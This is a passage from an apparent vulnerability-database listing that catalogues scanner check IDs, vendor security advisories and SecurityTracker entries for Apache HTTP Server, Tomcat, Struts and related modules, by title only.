15756| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
15757| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
15758| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
15759| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
15760| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
15761| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
15762| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
15763| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
15764| [801942] Apache Archiva Multiple Vulnerabilities
15765| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
15766| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
15767| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
15768| [801284] Apache Derby Information Disclosure Vulnerability
15769| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
15770| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
15771| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
15772| [800680] Apache APR Version Detection
15773| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
15774| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
15775| [800677] Apache Roller Version Detection
15776| [800279] Apache mod_jk Module Version Detection
15777| [800278] Apache Struts Cross Site Scripting Vulnerability
15778| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
15779| [800276] Apache Struts Version Detection
15780| [800271] Apache Struts Directory Traversal Vulnerability
15781| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
15782| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
15783| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
15784| [103122] Apache Web Server ETag Header Information Disclosure Weakness
15785| [103074] Apache Continuum Cross Site Scripting Vulnerability
15786| [103073] Apache Continuum Detection
15787| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
15788| [101023] Apache Open For Business Weak Password security check
15789| [101020] Apache Open For Business HTML injection vulnerability
15790| [101019] Apache Open For Business service detection
15791| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
15792| [100923] Apache Archiva Detection
15793| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
15794| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
15795| [100813] Apache Axis2 Detection
15796| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
15797| [100795] Apache Derby Detection
15798| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
15799| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
15800| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
15801| [100514] Apache Multiple Security Vulnerabilities
15802| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
15803| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
15804| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
15805| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15806| [72626] Debian Security Advisory DSA 2579-1 (apache2)
15807| [72612] FreeBSD Ports: apache22
15808| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
15809| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
15810| [71512] FreeBSD Ports: apache
15811| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
15812| [71256] Debian Security Advisory DSA 2452-1 (apache2)
15813| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
15814| [70737] FreeBSD Ports: apache
15815| [70724] Debian Security Advisory DSA 2405-1 (apache2)
15816| [70600] FreeBSD Ports: apache
15817| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
15818| [70235] Debian Security Advisory DSA 2298-2 (apache2)
15819| [70233] Debian Security Advisory DSA 2298-1 (apache2)
15820| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
15821| [69338] Debian Security Advisory DSA 2202-1 (apache2)
15822| [67868] FreeBSD Ports: apache
15823| [66816] FreeBSD Ports: apache
15824| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
15825| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
15826| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
15827| [66081] SLES11: Security update for Apache 2
15828| [66074] SLES10: Security update for Apache 2
15829| [66070] SLES9: Security update for Apache 2
15830| [65998] SLES10: Security update for apache2-mod_python
15831| [65893] SLES10: Security update for Apache 2
15832| [65888] SLES10: Security update for Apache 2
15833| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
15834| [65510] SLES9: Security update for Apache 2
15835| [65472] SLES9: Security update for Apache
15836| [65467] SLES9: Security update for Apache
15837| [65450] SLES9: Security update for apache2
15838| [65390] SLES9: Security update for Apache2
15839| [65363] SLES9: Security update for Apache2
15840| [65309] SLES9: Security update for Apache and mod_ssl
15841| [65296] SLES9: Security update for webdav apache module
15842| [65283] SLES9: Security update for Apache2
15843| [65249] SLES9: Security update for Apache 2
15844| [65230] SLES9: Security update for Apache 2
15845| [65228] SLES9: Security update for Apache 2
15846| [65212] SLES9: Security update for apache2-mod_python
15847| [65209] SLES9: Security update for apache2-worker
15848| [65207] SLES9: Security update for Apache 2
15849| [65168] SLES9: Security update for apache2-mod_python
15850| [65142] SLES9: Security update for Apache2
15851| [65136] SLES9: Security update for Apache 2
15852| [65132] SLES9: Security update for apache
15853| [65131] SLES9: Security update for Apache 2 oes/CORE
15854| [65113] SLES9: Security update for apache2
15855| [65072] SLES9: Security update for apache and mod_ssl
15856| [65017] SLES9: Security update for Apache 2
15857| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
15858| [64783] FreeBSD Ports: apache
15859| [64774] Ubuntu USN-802-2 (apache2)
15860| [64653] Ubuntu USN-813-2 (apache2)
15861| [64559] Debian Security Advisory DSA 1834-2 (apache2)
15862| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
15863| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
15864| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
15865| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
15866| [64443] Ubuntu USN-802-1 (apache2)
15867| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
15868| [64423] Debian Security Advisory DSA 1834-1 (apache2)
15869| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
15870| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
15871| [64251] Debian Security Advisory DSA 1816-1 (apache2)
15872| [64201] Ubuntu USN-787-1 (apache2)
15873| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
15874| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
15875| [63565] FreeBSD Ports: apache
15876| [63562] Ubuntu USN-731-1 (apache2)
15877| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
15878| [61185] FreeBSD Ports: apache
15879| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
15880| [60387] Slackware Advisory SSA:2008-045-02 apache
15881| [58826] FreeBSD Ports: apache-tomcat
15882| [58825] FreeBSD Ports: apache-tomcat
15883| [58804] FreeBSD Ports: apache
15884| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
15885| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
15886| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
15887| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
15888| [57335] Debian Security Advisory DSA 1167-1 (apache)
15889| [57201] Debian Security Advisory DSA 1131-1 (apache)
15890| [57200] Debian Security Advisory DSA 1132-1 (apache2)
15891| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
15892| [57145] FreeBSD Ports: apache
15893| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
15894| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
15895| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
15896| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
15897| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
15898| [56067] FreeBSD Ports: apache
15899| [55803] Slackware Advisory SSA:2005-310-04 apache
15900| [55519] Debian Security Advisory DSA 839-1 (apachetop)
15901| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
15902| [55355] FreeBSD Ports: apache
15903| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
15904| [55261] Debian Security Advisory DSA 805-1 (apache2)
15905| [55259] Debian Security Advisory DSA 803-1 (apache)
15906| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
15907| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
15908| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
15909| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
15910| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
15911| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
15912| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
15913| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
15914| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
15915| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
15916| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
15917| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
15918| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
15919| [54439] FreeBSD Ports: apache
15920| [53931] Slackware Advisory SSA:2004-133-01 apache
15921| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
15922| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
15923| [53878] Slackware Advisory SSA:2003-308-01 apache security update
15924| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
15925| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
15926| [53848] Debian Security Advisory DSA 131-1 (apache)
15927| [53784] Debian Security Advisory DSA 021-1 (apache)
15928| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
15929| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
15930| [53735] Debian Security Advisory DSA 187-1 (apache)
15931| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
15932| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
15933| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
15934| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
15935| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
15936| [53282] Debian Security Advisory DSA 594-1 (apache)
15937| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
15938| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
15939| [53215] Debian Security Advisory DSA 525-1 (apache)
15940| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
15941| [52529] FreeBSD Ports: apache+ssl
15942| [52501] FreeBSD Ports: apache
15943| [52461] FreeBSD Ports: apache
15944| [52390] FreeBSD Ports: apache
15945| [52389] FreeBSD Ports: apache
15946| [52388] FreeBSD Ports: apache
15947| [52383] FreeBSD Ports: apache
15948| [52339] FreeBSD Ports: apache+mod_ssl
15949| [52331] FreeBSD Ports: apache
15950| [52329] FreeBSD Ports: ru-apache+mod_ssl
15951| [52314] FreeBSD Ports: apache
15952| [52310] FreeBSD Ports: apache
15953| [15588] Detect Apache HTTPS
15954| [15555] Apache mod_proxy content-length buffer overflow
15955| [15554] Apache mod_include priviledge escalation
15956| [14771] Apache <= 1.3.33 htpasswd local overflow
15957| [14177] Apache mod_access rule bypass
15958| [13644] Apache mod_rootme Backdoor
15959| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
15960| [12280] Apache Connection Blocking Denial of Service
15961| [12239] Apache Error Log Escape Sequence Injection
15962| [12123] Apache Tomcat source.jsp malformed request information disclosure
15963| [12085] Apache Tomcat servlet/JSP container default files
15964| [11438] Apache Tomcat Directory Listing and File disclosure
15965| [11204] Apache Tomcat Default Accounts
15966| [11092] Apache 2.0.39 Win32 directory traversal
15967| [11046] Apache Tomcat TroubleShooter Servlet Installed
15968| [11042] Apache Tomcat DOS Device Name XSS
15969| [11041] Apache Tomcat /servlet Cross Site Scripting
15970| [10938] Apache Remote Command Execution via .bat files
15971| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
15972| [10773] MacOS X Finder reveals contents of Apache Web files
15973| [10766] Apache UserDir Sensitive Information Disclosure
15974| [10756] MacOS X Finder reveals contents of Apache Web directories
15975| [10752] Apache Auth Module SQL Insertion Attack
15976| [10704] Apache Directory Listing
15977| [10678] Apache /server-info accessible
15978| [10677] Apache /server-status accessible
15979| [10440] Check for Apache Multiple / vulnerability
15980|
15981| SecurityTracker - https://www.securitytracker.com:
15982| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
15983| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
15984| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
15985| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
15986| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15987| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15988| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15989| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
15990| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
15991| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
15992| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15993| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
15994| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
15995| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
15996| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
15997| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
15998| [1028286] Apache CXF WS-Security UsernameToken Processing Flaw Lets Remote Users Bypass Authentication
15999| [1028252] Apache Commons FileUpload Unsafe Temporary File Lets Local Users Gain Elevated Privileges
16000| [1028207] Apache Input Validation Bugs Permit Cross-Site Scripting Attacks
16001| [1027836] Apache Tomcat Connection Processing Bug Lets Remote Users Deny Service
16002| [1027834] Apache Tomcat Bug Lets Remote Users Bypass Cross-Site Request Forgery Prevention Filter
16003| [1027833] Apache Tomcat Bug Lets Remote Users Bypass Security Constraints
16004| [1027729] Apache Tomcat Header Processing Bug Lets Remote Users Deny Service
16005| [1027728] Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
16006| [1027554] Apache CXF Lets Remote Authenticated Users Execute Unauthorized SOAP Actions
16007| [1027508] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
16008| [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
16009| [1027096] Apache Commons Compress BZip2CompressorOutputStream() Sorting Algorithm Lets Remote or Local Users Deny Service
16010| [1026932] Apache LD_LIBRARY_PATH Processing Lets Local Users Gain Elevated Privileges
16011| [1026928] Apache OFBiz Unspecified Flaw Lets Remote Users Execute Arbitrary Code
16012| [1026927] Apache OFBiz Input Validation Flaws Permit Cross-Site Scripting Attacks
16013| [1026847] Apache Traffic Server Host Header Processing Flaw Lets Remote Users Deny Service
16014| [1026846] Apache Wicket Discloses Hidden Application Files to Remote Users
16015| [1026839] Apache Wicket Input Validation Flaw in 'wicket:pageMapName' Parameter Permits Cross-Site Scripting Attacks
16016| [1026616] Apache Bugs Let Remote Users Deny Service and Obtain Cookie Data
16017| [1026575] Apache Struts ParameterInterceptor() Flaw Lets Remote Users Execute Arbitrary Commands
16018| [1026484] Apache Struts Bug Lets Remote Users Overwrite Files and Execute Arbitrary Code
16019| [1026477] Apache Tomcat Hash Table Collision Bug Lets Remote Users Deny Service
16020| [1026402] Apache Struts Conversion Error Lets Remote Users Inject Arbitrary Commands
16021| [1026353] Apache mod_proxy/mod_rewrite Bug Lets Remote Users Access Internal Servers
16022| [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges
16023| [1026267] Apache .htaccess File Integer Overflow Lets Local Users Execute Arbitrary Code
16024| [1026144] Apache mod_proxy Pattern Matching Bug Lets Remote Users Access Internal Servers
16025| [1026095] Apache Tomcat HTTP DIGEST Authentication Weaknesses Let Remote Users Conduct Bypass Attacks
16026| [1026054] Apache mod_proxy_ajp HTTP Processing Error Lets Remote Users Deny Service
16027| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
16028| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
16029| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
16030| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
16031| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
16032| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
16033| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
16034| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
16035| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
16036| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
16037| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
16038| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
16039| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
16040| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
16041| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
16042| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
16043| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
16044| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
16045| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
16046| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
16047| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
16048| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
16049| [1024096] Apache mod_proxy_http May Return Results for a Different Request
16050| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
16051| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
16052| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
16053| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
16054| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
16055| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
16056| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
16057| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
16058| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
16059| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
16060| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
16061| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
16062| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
16063| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
16064| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
16065| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
16066| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
16067| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
16068| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
16069| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
16070| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
16071| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
16072| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
16073| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
16074| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
16075| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
16076| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
16077| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
16078| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
16079| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
16080| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
16081| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
16082| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
16083| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
16084| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
16085| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
16086| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
16087| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
16088| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
16089| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
16090| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
16091| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
16092| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
16093| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
16094| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
16095| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
16096| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
16097| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
16098| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
16099| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
16100| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
16101| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
16102| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
16103| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
16104| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
16105| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
16106| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
16107| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
16108| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
16109| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
16110| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
16111| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
16112| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
16113| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
16114| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
16115| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
16116| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
16117| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
16118| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
16119| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
16120| [1008920] Apache mod_digest May Validate Replayed Client Responses
16121| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
16122| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
16123| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
16124| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
16125| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
16126| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
16127| [1008030] Apache mod_rewrite Contains a Buffer Overflow
16128| [1008029] Apache mod_alias Contains a Buffer Overflow
16129| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
16130| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
16131| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
16132| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
16133| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
16134| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
16135| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
16136| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
16137| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
16138| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
16139| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
16140| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
16141| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
16142| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
16143| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
16144| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
16145| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
16146| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
16147| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
16148| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
16149| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
16150| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
16151| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
16152| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
16153| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
16154| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
16155| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
16156| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
16157| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
16158| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
16159| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
16160| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
16161| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
16162| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
16163| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
